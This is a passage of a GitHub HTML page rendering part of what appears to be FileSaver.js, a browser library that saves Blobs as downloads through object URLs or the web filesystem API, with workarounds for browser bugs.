      </tr>
      <tr>
        <td id="L34" class="blob-num js-line-number" data-line-number="34"></td>
        <td id="LC34" class="blob-code blob-code-inner js-file-line">			);</td>
      </tr>
      <tr>
        <td id="L35" class="blob-num js-line-number" data-line-number="35"></td>
        <td id="LC35" class="blob-code blob-code-inner js-file-line">			node.dispatchEvent(<span class="pl-c1">event</span>);</td>
      </tr>
      <tr>
        <td id="L36" class="blob-num js-line-number" data-line-number="36"></td>
        <td id="LC36" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L37" class="blob-num js-line-number" data-line-number="37"></td>
        <td id="LC37" class="blob-code blob-code-inner js-file-line">		, webkit_req_fs <span class="pl-k">=</span> view.webkitRequestFileSystem</td>
      </tr>
      <tr>
        <td id="L38" class="blob-num js-line-number" data-line-number="38"></td>
        <td id="LC38" class="blob-code blob-code-inner js-file-line">		, req_fs <span class="pl-k">=</span> view.requestFileSystem <span class="pl-k">||</span> webkit_req_fs <span class="pl-k">||</span> view.mozRequestFileSystem</td>
      </tr>
      <tr>
        <td id="L39" class="blob-num js-line-number" data-line-number="39"></td>
        <td id="LC39" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">throw_outside</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">ex</span>) {</td>
      </tr>
      <tr>
        <td id="L40" class="blob-num js-line-number" data-line-number="40"></td>
        <td id="LC40" class="blob-code blob-code-inner js-file-line">			(view.setImmediate <span class="pl-k">||</span> view.setTimeout)(<span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L41" class="blob-num js-line-number" data-line-number="41"></td>
        <td id="LC41" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">throw</span> ex;</td>
      </tr>
      <tr>
        <td id="L42" class="blob-num js-line-number" data-line-number="42"></td>
        <td id="LC42" class="blob-code blob-code-inner js-file-line">			}, <span class="pl-c1">0</span>);</td>
      </tr>
      <tr>
        <td id="L43" class="blob-num js-line-number" data-line-number="43"></td>
        <td id="LC43" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L44" class="blob-num js-line-number" data-line-number="44"></td>
        <td id="LC44" class="blob-code blob-code-inner js-file-line">		, force_saveable_type <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">&quot;</span>application/octet-stream<span class="pl-pds">&quot;</span></span></td>
      </tr>
      <tr>
        <td id="L45" class="blob-num js-line-number" data-line-number="45"></td>
        <td id="LC45" class="blob-code blob-code-inner js-file-line">		, fs_min_size <span class="pl-k">=</span> <span class="pl-c1">0</span></td>
      </tr>
      <tr>
        <td id="L46" class="blob-num js-line-number" data-line-number="46"></td>
        <td id="LC46" class="blob-code blob-code-inner js-file-line">		<span class="pl-c">// See https://code.google.com/p/chromium/issues/detail?id=375297#c7 and</span></td>
      </tr>
      <tr>
        <td id="L47" class="blob-num js-line-number" data-line-number="47"></td>
        <td id="LC47" class="blob-code blob-code-inner js-file-line">		<span class="pl-c">// https://github.com/eligrey/FileSaver.js/commit/485930a#commitcomment-8768047</span></td>
      </tr>
      <tr>
        <td id="L48" class="blob-num js-line-number" data-line-number="48"></td>
        <td id="LC48" class="blob-code blob-code-inner js-file-line">		<span class="pl-c">// for the reasoning behind the timeout and revocation flow</span></td>
      </tr>
      <tr>
        <td id="L49" class="blob-num js-line-number" data-line-number="49"></td>
        <td id="LC49" class="blob-code blob-code-inner js-file-line">		, arbitrary_revoke_timeout <span class="pl-k">=</span> <span class="pl-c1">500</span> <span class="pl-c">// in ms</span></td>
      </tr>
      <tr>
        <td id="L50" class="blob-num js-line-number" data-line-number="50"></td>
        <td id="LC50" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">revoke</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">file</span>) {</td>
      </tr>
      <tr>
        <td id="L51" class="blob-num js-line-number" data-line-number="51"></td>
        <td id="LC51" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">var</span> <span class="pl-en">revoker</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L52" class="blob-num js-line-number" data-line-number="52"></td>
        <td id="LC52" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">if</span> (<span class="pl-k">typeof</span> file <span class="pl-k">===</span> <span class="pl-s"><span class="pl-pds">&quot;</span>string<span class="pl-pds">&quot;</span></span>) { <span class="pl-c">// file is an object URL</span></td>
      </tr>
      <tr>
        <td id="L53" class="blob-num js-line-number" data-line-number="53"></td>
        <td id="LC53" class="blob-code blob-code-inner js-file-line">					get_URL().revokeObjectURL(file);</td>
      </tr>
      <tr>
        <td id="L54" class="blob-num js-line-number" data-line-number="54"></td>
        <td id="LC54" class="blob-code blob-code-inner js-file-line">				} <span class="pl-k">else</span> { <span class="pl-c">// file is a File</span></td>
      </tr>
      <tr>
        <td id="L55" class="blob-num js-line-number" data-line-number="55"></td>
        <td id="LC55" class="blob-code blob-code-inner js-file-line">					file.<span class="pl-c1">remove</span>();</td>
      </tr>
      <tr>
        <td id="L56" class="blob-num js-line-number" data-line-number="56"></td>
        <td id="LC56" class="blob-code blob-code-inner js-file-line">				}</td>
      </tr>
      <tr>
        <td id="L57" class="blob-num js-line-number" data-line-number="57"></td>
        <td id="LC57" class="blob-code blob-code-inner js-file-line">			};</td>
      </tr>
      <tr>
        <td id="L58" class="blob-num js-line-number" data-line-number="58"></td>
        <td id="LC58" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (view.chrome) {</td>
      </tr>
      <tr>
        <td id="L59" class="blob-num js-line-number" data-line-number="59"></td>
        <td id="LC59" class="blob-code blob-code-inner js-file-line">				revoker();</td>
      </tr>
      <tr>
        <td id="L60" class="blob-num js-line-number" data-line-number="60"></td>
        <td id="LC60" class="blob-code blob-code-inner js-file-line">			} <span class="pl-k">else</span> {</td>
      </tr>
      <tr>
        <td id="L61" class="blob-num js-line-number" data-line-number="61"></td>
        <td id="LC61" class="blob-code blob-code-inner js-file-line">				<span class="pl-c1">setTimeout</span>(revoker, arbitrary_revoke_timeout);</td>
      </tr>
      <tr>
        <td id="L62" class="blob-num js-line-number" data-line-number="62"></td>
        <td id="LC62" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L63" class="blob-num js-line-number" data-line-number="63"></td>
        <td id="LC63" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L64" class="blob-num js-line-number" data-line-number="64"></td>
        <td id="LC64" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">dispatch</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">filesaver</span>, <span class="pl-smi">event_types</span>, <span class="pl-smi">event</span>) {</td>
      </tr>
      <tr>
        <td id="L65" class="blob-num js-line-number" data-line-number="65"></td>
        <td id="LC65" class="blob-code blob-code-inner js-file-line">			event_types <span class="pl-k">=</span> [].<span class="pl-c1">concat</span>(event_types);</td>
      </tr>
      <tr>
        <td id="L66" class="blob-num js-line-number" data-line-number="66"></td>
        <td id="LC66" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">var</span> i <span class="pl-k">=</span> event_types.<span class="pl-c1">length</span>;</td>
      </tr>
      <tr>
        <td id="L67" class="blob-num js-line-number" data-line-number="67"></td>
        <td id="LC67" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">while</span> (i<span class="pl-k">--</span>) {</td>
      </tr>
      <tr>
        <td id="L68" class="blob-num js-line-number" data-line-number="68"></td>
        <td id="LC68" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">var</span> listener <span class="pl-k">=</span> filesaver[<span class="pl-s"><span class="pl-pds">&quot;</span>on<span class="pl-pds">&quot;</span></span> <span class="pl-k">+</span> event_types[i]];</td>
      </tr>
      <tr>
        <td id="L69" class="blob-num js-line-number" data-line-number="69"></td>
        <td id="LC69" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">if</span> (<span class="pl-k">typeof</span> listener <span class="pl-k">===</span> <span class="pl-s"><span class="pl-pds">&quot;</span>function<span class="pl-pds">&quot;</span></span>) {</td>
      </tr>
      <tr>
        <td id="L70" class="blob-num js-line-number" data-line-number="70"></td>
        <td id="LC70" class="blob-code blob-code-inner js-file-line">					<span class="pl-k">try</span> {</td>
      </tr>
      <tr>
        <td id="L71" class="blob-num js-line-number" data-line-number="71"></td>
        <td id="LC71" class="blob-code blob-code-inner js-file-line">						listener.<span class="pl-c1">call</span>(filesaver, <span class="pl-c1">event</span> <span class="pl-k">||</span> filesaver);</td>
      </tr>
      <tr>
        <td id="L72" class="blob-num js-line-number" data-line-number="72"></td>
        <td id="LC72" class="blob-code blob-code-inner js-file-line">					} <span class="pl-k">catch</span> (ex) {</td>
      </tr>
      <tr>
        <td id="L73" class="blob-num js-line-number" data-line-number="73"></td>
        <td id="LC73" class="blob-code blob-code-inner js-file-line">						throw_outside(ex);</td>
      </tr>
      <tr>
        <td id="L74" class="blob-num js-line-number" data-line-number="74"></td>
        <td id="LC74" class="blob-code blob-code-inner js-file-line">					}</td>
      </tr>
      <tr>
        <td id="L75" class="blob-num js-line-number" data-line-number="75"></td>
        <td id="LC75" class="blob-code blob-code-inner js-file-line">				}</td>
      </tr>
      <tr>
        <td id="L76" class="blob-num js-line-number" data-line-number="76"></td>
        <td id="LC76" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L77" class="blob-num js-line-number" data-line-number="77"></td>
        <td id="LC77" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L78" class="blob-num js-line-number" data-line-number="78"></td>
        <td id="LC78" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">auto_bom</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">blob</span>) {</td>
      </tr>
      <tr>
        <td id="L79" class="blob-num js-line-number" data-line-number="79"></td>
        <td id="LC79" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// prepend BOM for UTF-8 XML and text/* types (including HTML)</span></td>
      </tr>
      <tr>
        <td id="L80" class="blob-num js-line-number" data-line-number="80"></td>
        <td id="LC80" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (<span class="pl-sr"><span class="pl-pds">/</span><span class="pl-k">^</span><span class="pl-c1">\s</span><span class="pl-k">*</span>(?:text<span class="pl-cce">\/</span><span class="pl-c1">\S</span><span class="pl-k">*</span><span class="pl-k">|</span>application<span class="pl-cce">\/</span>xml<span class="pl-k">|</span><span class="pl-c1">\S</span><span class="pl-k">*</span><span class="pl-cce">\/</span><span class="pl-c1">\S</span><span class="pl-k">*</span><span class="pl-cce">\+</span>xml)<span class="pl-c1">\s</span><span class="pl-k">*</span>;<span class="pl-c1">.</span><span class="pl-k">*</span>charset<span class="pl-c1">\s</span><span class="pl-k">*</span>=<span class="pl-c1">\s</span><span class="pl-k">*</span>utf-8<span class="pl-pds">/</span>i</span>.<span class="pl-c1">test</span>(blob.<span class="pl-c1">type</span>)) {</td>
      </tr>
      <tr>
        <td id="L81" class="blob-num js-line-number" data-line-number="81"></td>
        <td id="LC81" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">return</span> <span class="pl-k">new</span> <span class="pl-en">Blob</span>([<span class="pl-s"><span class="pl-pds">&quot;</span><span class="pl-cce">\u</span>feff<span class="pl-pds">&quot;</span></span>, blob], {type<span class="pl-k">:</span> blob.<span class="pl-c1">type</span>});</td>
      </tr>
      <tr>
        <td id="L82" class="blob-num js-line-number" data-line-number="82"></td>
        <td id="LC82" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L83" class="blob-num js-line-number" data-line-number="83"></td>
        <td id="LC83" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">return</span> blob;</td>
      </tr>
      <tr>
        <td id="L84" class="blob-num js-line-number" data-line-number="84"></td>
        <td id="LC84" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L85" class="blob-num js-line-number" data-line-number="85"></td>
        <td id="LC85" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">FileSaver</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">blob</span>, <span class="pl-smi">name</span>) {</td>
      </tr>
      <tr>
        <td id="L86" class="blob-num js-line-number" data-line-number="86"></td>
        <td id="LC86" class="blob-code blob-code-inner js-file-line">			blob <span class="pl-k">=</span> auto_bom(blob);</td>
      </tr>
      <tr>
        <td id="L87" class="blob-num js-line-number" data-line-number="87"></td>
        <td id="LC87" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// First try a.download, then web filesystem, then object URLs</span></td>
      </tr>
      <tr>
        <td id="L88" class="blob-num js-line-number" data-line-number="88"></td>
        <td id="LC88" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">var</span></td>
      </tr>
      <tr>
        <td id="L89" class="blob-num js-line-number" data-line-number="89"></td>
        <td id="LC89" class="blob-code blob-code-inner js-file-line">				  filesaver <span class="pl-k">=</span> <span class="pl-v">this</span></td>
      </tr>
      <tr>
        <td id="L90" class="blob-num js-line-number" data-line-number="90"></td>
        <td id="LC90" class="blob-code blob-code-inner js-file-line">				, type <span class="pl-k">=</span> blob.<span class="pl-c1">type</span></td>
      </tr>
      <tr>
        <td id="L91" class="blob-num js-line-number" data-line-number="91"></td>
        <td id="LC91" class="blob-code blob-code-inner js-file-line">				, blob_changed <span class="pl-k">=</span> <span class="pl-c1">false</span></td>
      </tr>
      <tr>
        <td id="L92" class="blob-num js-line-number" data-line-number="92"></td>
        <td id="LC92" class="blob-code blob-code-inner js-file-line">				, object_url</td>
      </tr>
      <tr>
        <td id="L93" class="blob-num js-line-number" data-line-number="93"></td>
        <td id="LC93" class="blob-code blob-code-inner js-file-line">				, target_view</td>
      </tr>
      <tr>
        <td id="L94" class="blob-num js-line-number" data-line-number="94"></td>
        <td id="LC94" class="blob-code blob-code-inner js-file-line">				, <span class="pl-en">dispatch_all</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L95" class="blob-num js-line-number" data-line-number="95"></td>
        <td id="LC95" class="blob-code blob-code-inner js-file-line">					dispatch(filesaver, <span class="pl-s"><span class="pl-pds">&quot;</span>writestart progress write writeend<span class="pl-pds">&quot;</span></span>.<span class="pl-c1">split</span>(<span class="pl-s"><span class="pl-pds">&quot;</span> <span class="pl-pds">&quot;</span></span>));</td>
      </tr>
      <tr>
        <td id="L96" class="blob-num js-line-number" data-line-number="96"></td>
        <td id="LC96" class="blob-code blob-code-inner js-file-line">				}</td>
      </tr>
      <tr>
        <td id="L97" class="blob-num js-line-number" data-line-number="97"></td>
        <td id="LC97" class="blob-code blob-code-inner js-file-line">				<span class="pl-c">// on any filesys errors revert to saving with object URLs</span></td>
      </tr>
      <tr>
        <td id="L98" class="blob-num js-line-number" data-line-number="98"></td>
        <td id="LC98" class="blob-code blob-code-inner js-file-line">				, <span class="pl-en">fs_error</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L99" class="blob-num js-line-number" data-line-number="99"></td>
        <td id="LC99" class="blob-code blob-code-inner js-file-line">					<span class="pl-c">// don&#39;t create more object URLs than needed</span></td>
      </tr>
      <tr>
        <td id="L100" class="blob-num js-line-number" data-line-number="100"></td>
        <td id="LC100" class="blob-code blob-code-inner js-file-line">					<span class="pl-k">if</span> (blob_changed <span class="pl-k">||</span> <span class="pl-k">!</span>object_url) {</td>
      </tr>
      <tr>
        <td id="L101" class="blob-num js-line-number" data-line-number="101"></td>
        <td id="LC101" class="blob-code blob-code-inner js-file-line">						object_url <span class="pl-k">=</span> get_URL().createObjectURL(blob);</td>
      </tr>
      <tr>
        <td id="L102" class="blob-num js-line-number" data-line-number="102"></td>
        <td id="LC102" class="blob-code blob-code-inner js-file-line">					}</td>
      </tr>
      <tr>
        <td id="L103" class="blob-num js-line-number" data-line-number="103"></td>
        <td id="LC103" class="blob-code blob-code-inner js-file-line">					<span class="pl-k">if</span> (target_view) {</td>
      </tr>
      <tr>
        <td id="L104" class="blob-num js-line-number" data-line-number="104"></td>
        <td id="LC104" class="blob-code blob-code-inner js-file-line">						target_view.<span class="pl-c1">location</span>.<span class="pl-c1">href</span> <span class="pl-k">=</span> object_url;</td>
      </tr>
      <tr>
        <td id="L105" class="blob-num js-line-number" data-line-number="105"></td>
        <td id="LC105" class="blob-code blob-code-inner js-file-line">					} <span class="pl-k">else</span> {</td>
      </tr>
      <tr>
        <td id="L106" class="blob-num js-line-number" data-line-number="106"></td>
        <td id="LC106" class="blob-code blob-code-inner js-file-line">						<span class="pl-k">var</span> new_tab <span class="pl-k">=</span> view.<span class="pl-c1">open</span>(object_url, <span class="pl-s"><span class="pl-pds">&quot;</span>_blank<span class="pl-pds">&quot;</span></span>);</td>
      </tr>
      <tr>
        <td id="L107" class="blob-num js-line-number" data-line-number="107"></td>
        <td id="LC107" class="blob-code blob-code-inner js-file-line">						<span class="pl-k">if</span> (new_tab <span class="pl-k">==</span> <span class="pl-c1">undefined</span> <span class="pl-k">&amp;&amp;</span> <span class="pl-k">typeof</span> safari <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span>) {</td>
      </tr>
      <tr>
        <td id="L108" class="blob-num js-line-number" data-line-number="108"></td>
        <td id="LC108" class="blob-code blob-code-inner js-file-line">							<span class="pl-c">//Apple do not allow window.open, see http://bit.ly/1kZffRI</span></td>
      </tr>
      <tr>
        <td id="L109" class="blob-num js-line-number" data-line-number="109"></td>
        <td id="LC109" class="blob-code blob-code-inner js-file-line">							view.<span class="pl-c1">location</span>.<span class="pl-c1">href</span> <span class="pl-k">=</span> object_url</td>
      </tr>
      <tr>
        <td id="L110" class="blob-num js-line-number" data-line-number="110"></td>
        <td id="LC110" class="blob-code blob-code-inner js-file-line">						}</td>
      </tr>
      <tr>
        <td id="L111" class="blob-num js-line-number" data-line-number="111"></td>
        <td id="LC111" class="blob-code blob-code-inner js-file-line">					}</td>
      </tr>
      <tr>
        <td id="L112" class="blob-num js-line-number" data-line-number="112"></td>
        <td id="LC112" class="blob-code blob-code-inner js-file-line">					filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.DONE;</td>
      </tr>
      <tr>
        <td id="L113" class="blob-num js-line-number" data-line-number="113"></td>
        <td id="LC113" class="blob-code blob-code-inner js-file-line">					dispatch_all();</td>
      </tr>
      <tr>
        <td id="L114" class="blob-num js-line-number" data-line-number="114"></td>
        <td id="LC114" class="blob-code blob-code-inner js-file-line">					revoke(object_url);</td>
      </tr>
      <tr>
        <td id="L115" class="blob-num js-line-number" data-line-number="115"></td>
        <td id="LC115" class="blob-code blob-code-inner js-file-line">				}</td>
      </tr>
      <tr>
        <td id="L116" class="blob-num js-line-number" data-line-number="116"></td>
        <td id="LC116" class="blob-code blob-code-inner js-file-line">				, <span class="pl-en">abortable</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">func</span>) {</td>
      </tr>
      <tr>
        <td id="L117" class="blob-num js-line-number" data-line-number="117"></td>
        <td id="LC117" class="blob-code blob-code-inner js-file-line">					<span class="pl-k">return</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L118" class="blob-num js-line-number" data-line-number="118"></td>
        <td id="LC118" class="blob-code blob-code-inner js-file-line">						<span class="pl-k">if</span> (filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">!==</span> filesaver.DONE) {</td>
      </tr>
      <tr>
        <td id="L119" class="blob-num js-line-number" data-line-number="119"></td>
        <td id="LC119" class="blob-code blob-code-inner js-file-line">							<span class="pl-k">return</span> func.<span class="pl-c1">apply</span>(<span class="pl-v">this</span>, arguments);</td>
      </tr>
      <tr>
        <td id="L120" class="blob-num js-line-number" data-line-number="120"></td>
        <td id="LC120" class="blob-code blob-code-inner js-file-line">						}</td>
      </tr>
      <tr>
        <td id="L121" class="blob-num js-line-number" data-line-number="121"></td>
        <td id="LC121" class="blob-code blob-code-inner js-file-line">					};</td>
      </tr>
      <tr>
        <td id="L122" class="blob-num js-line-number" data-line-number="122"></td>
        <td id="LC122" class="blob-code blob-code-inner js-file-line">				}</td>
      </tr>
      <tr>
        <td id="L123" class="blob-num js-line-number" data-line-number="123"></td>
        <td id="LC123" class="blob-code blob-code-inner js-file-line">				, create_if_not_found <span class="pl-k">=</span> {create<span class="pl-k">:</span> <span class="pl-c1">true</span>, exclusive<span class="pl-k">:</span> <span class="pl-c1">false</span>}</td>
      </tr>
      <tr>
        <td id="L124" class="blob-num js-line-number" data-line-number="124"></td>
        <td id="LC124" class="blob-code blob-code-inner js-file-line">				, slice</td>
      </tr>
      <tr>
        <td id="L125" class="blob-num js-line-number" data-line-number="125"></td>
        <td id="LC125" class="blob-code blob-code-inner js-file-line">			;</td>
      </tr>
      <tr>
        <td id="L126" class="blob-num js-line-number" data-line-number="126"></td>
        <td id="LC126" class="blob-code blob-code-inner js-file-line">			filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.INIT;</td>
      </tr>
      <tr>
        <td id="L127" class="blob-num js-line-number" data-line-number="127"></td>
        <td id="LC127" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (<span class="pl-k">!</span>name) {</td>
      </tr>
      <tr>
        <td id="L128" class="blob-num js-line-number" data-line-number="128"></td>
        <td id="LC128" class="blob-code blob-code-inner js-file-line">				name <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">&quot;</span>download<span class="pl-pds">&quot;</span></span>;</td>
      </tr>
      <tr>
        <td id="L129" class="blob-num js-line-number" data-line-number="129"></td>
        <td id="LC129" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L130" class="blob-num js-line-number" data-line-number="130"></td>
        <td id="LC130" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (can_use_save_link) {</td>
      </tr>
      <tr>
        <td id="L131" class="blob-num js-line-number" data-line-number="131"></td>
        <td id="LC131" class="blob-code blob-code-inner js-file-line">				object_url <span class="pl-k">=</span> get_URL().createObjectURL(blob);</td>
      </tr>
      <tr>
        <td id="L132" class="blob-num js-line-number" data-line-number="132"></td>
        <td id="LC132" class="blob-code blob-code-inner js-file-line">				save_link.<span class="pl-c1">href</span> <span class="pl-k">=</span> object_url;</td>
      </tr>
      <tr>
        <td id="L133" class="blob-num js-line-number" data-line-number="133"></td>
        <td id="LC133" class="blob-code blob-code-inner js-file-line">				save_link.download <span class="pl-k">=</span> name;</td>
      </tr>
      <tr>
        <td id="L134" class="blob-num js-line-number" data-line-number="134"></td>
        <td id="LC134" class="blob-code blob-code-inner js-file-line">				<span class="pl-c1">click</span>(save_link);</td>
      </tr>
      <tr>
        <td id="L135" class="blob-num js-line-number" data-line-number="135"></td>
        <td id="LC135" class="blob-code blob-code-inner js-file-line">				filesaver.<span class="pl-c1">readyState</span> <span class="pl-k">=</span> filesaver.DONE;</td>
      </tr>
      <tr>
        <td id="L136" class="blob-num js-line-number" data-line-number="136"></td>
        <td id="LC136" class="blob-code blob-code-inner js-file-line">				dispatch_all();</td>
      </tr>
      <tr>
        <td id="L137" class="blob-num js-line-number" data-line-number="137"></td>
        <td id="LC137" class="blob-code blob-code-inner js-file-line">				revoke(object_url);</td>
      </tr>
      <tr>
        <td id="L138" class="blob-num js-line-number" data-line-number="138"></td>
        <td id="LC138" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">return</span>;</td>
      </tr>
      <tr>
        <td id="L139" class="blob-num js-line-number" data-line-number="139"></td>
        <td id="LC139" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L140" class="blob-num js-line-number" data-line-number="140"></td>
        <td id="LC140" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// Object and web filesystem URLs have a problem saving in Google Chrome when</span></td>
      </tr>
      <tr>
        <td id="L141" class="blob-num js-line-number" data-line-number="141"></td>
        <td id="LC141" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// viewed in a tab, so I force save with application/octet-stream</span></td>
      </tr>
      <tr>
        <td id="L142" class="blob-num js-line-number" data-line-number="142"></td>
        <td id="LC142" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// http://code.google.com/p/chromium/issues/detail?id=91158</span></td>
      </tr>
      <tr>
        <td id="L143" class="blob-num js-line-number" data-line-number="143"></td>
        <td id="LC143" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// Update: Google errantly closed 91158, I submitted it again:</span></td>
      </tr>
      <tr>
        <td id="L144" class="blob-num js-line-number" data-line-number="144"></td>
        <td id="LC144" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// https://code.google.com/p/chromium/issues/detail?id=389642</span></td>
      </tr>
      <tr>
        <td id="L145" class="blob-num js-line-number" data-line-number="145"></td>
        <td id="LC145" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (view.chrome <span class="pl-k">&amp;&amp;</span> type <span class="pl-k">&amp;&amp;</span> type <span class="pl-k">!==</span> force_saveable_type) {</td>
      </tr>
      <tr>
        <td id="L146" class="blob-num js-line-number" data-line-number="146"></td>
        <td id="LC146" class="blob-code blob-code-inner js-file-line">				slice <span class="pl-k">=</span> blob.slice <span class="pl-k">||</span> blob.webkitSlice;</td>
      </tr>
      <tr>
        <td id="L147" class="blob-num js-line-number" data-line-number="147"></td>
        <td id="LC147" class="blob-code blob-code-inner js-file-line">				blob <span class="pl-k">=</span> slice.<span class="pl-c1">call</span>(blob, <span class="pl-c1">0</span>, blob.<span class="pl-c1">size</span>, force_saveable_type);</td>
      </tr>
      <tr>
        <td id="L148" class="blob-num js-line-number" data-line-number="148"></td>
        <td id="LC148" class="blob-code blob-code-inner js-file-line">				blob_changed <span class="pl-k">=</span> <span class="pl-c1">true</span>;</td>
      </tr>
      <tr>
        <td id="L149" class="blob-num js-line-number" data-line-number="149"></td>
        <td id="LC149" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L150" class="blob-num js-line-number" data-line-number="150"></td>
        <td id="LC150" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// Since I can&#39;t be sure that the guessed media type will trigger a download</span></td>
      </tr>
      <tr>
        <td id="L151" class="blob-num js-line-number" data-line-number="151"></td>
        <td id="LC151" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// in WebKit, I append .download to the filename.</span></td>
      </tr>
      <tr>
        <td id="L152" class="blob-num js-line-number" data-line-number="152"></td>
        <td id="LC152" class="blob-code blob-code-inner js-file-line">			<span class="pl-c">// https://bugs.webkit.org/show_bug.cgi?id=65440</span></td>
      </tr>
      <tr>
        <td id="L153" class="blob-num js-line-number" data-line-number="153"></td>
        <td id="LC153" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (webkit_req_fs <span class="pl-k">&amp;&amp;</span> name <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>download<span class="pl-pds">&quot;</span></span>) {</td>
      </tr>
      <tr>
        <td id="L154" class="blob-num js-line-number" data-line-number="154"></td>
        <td id="LC154" class="blob-code blob-code-inner js-file-line">				name <span class="pl-k">+=</span> <span class="pl-s"><span class="pl-pds">&quot;</span>.download<span class="pl-pds">&quot;</span></span>;</td>
      </tr>
      <tr>
        <td id="L155" class="blob-num js-line-number" data-line-number="155"></td>
        <td id="LC155" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L156" class="blob-num js-line-number" data-line-number="156"></td>
        <td id="LC156" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (type <span class="pl-k">===</span> force_saveable_type <span class="pl-k">||</span> webkit_req_fs) {</td>
      </tr>
      <tr>
        <td id="L157" class="blob-num js-line-number" data-line-number="157"></td>
        <td id="LC157" class="blob-code blob-code-inner js-file-line">				target_view <span class="pl-k">=</span> view;</td>
      </tr>
      <tr>
        <td id="L158" class="blob-num js-line-number" data-line-number="158"></td>
        <td id="LC158" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L159" class="blob-num js-line-number" data-line-number="159"></td>
        <td id="LC159" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">if</span> (<span class="pl-k">!</span>req_fs) {</td>
      </tr>
      <tr>
        <td id="L160" class="blob-num js-line-number" data-line-number="160"></td>
        <td id="LC160" class="blob-code blob-code-inner js-file-line">				fs_error();</td>
      </tr>
      <tr>
        <td id="L161" class="blob-num js-line-number" data-line-number="161"></td>
        <td id="LC161" class="blob-code blob-code-inner js-file-line">				<span class="pl-k">return</span>;</td>
      </tr>
      <tr>
        <td id="L162" class="blob-num js-line-number" data-line-number="162"></td>
        <td id="LC162" class="blob-code blob-code-inner js-file-line">			}</td>
      </tr>
      <tr>
        <td id="L163" class="blob-num js-line-number" data-line-number="163"></td>
        <td id="LC163" class="blob-code blob-code-inner js-file-line">			fs_min_size <span class="pl-k">+=</span> blob.<span class="pl-c1">size</span>;</td>
      </tr>
      <tr>
        <td id="L164" class="blob-num js-line-number" data-line-number="164"></td>
        <td id="LC164" class="blob-code blob-code-inner js-file-line">			req_fs(view.TEMPORARY, fs_min_size, abortable(<span class="pl-k">function</span>(<span class="pl-smi">fs</span>) {</td>
      </tr>
      <tr>
        <td id="L165" class="blob-num js-line-number" data-line-number="165"></td>
        <td id="LC165" class="blob-code blob-code-inner js-file-line">				fs.root.getDirectory(<span class="pl-s"><span class="pl-pds">&quot;</span>saved<span class="pl-pds">&quot;</span></span>, create_if_not_found, abortable(<span class="pl-k">function</span>(<span class="pl-smi">dir</span>) {</td>
      </tr>
      <tr>
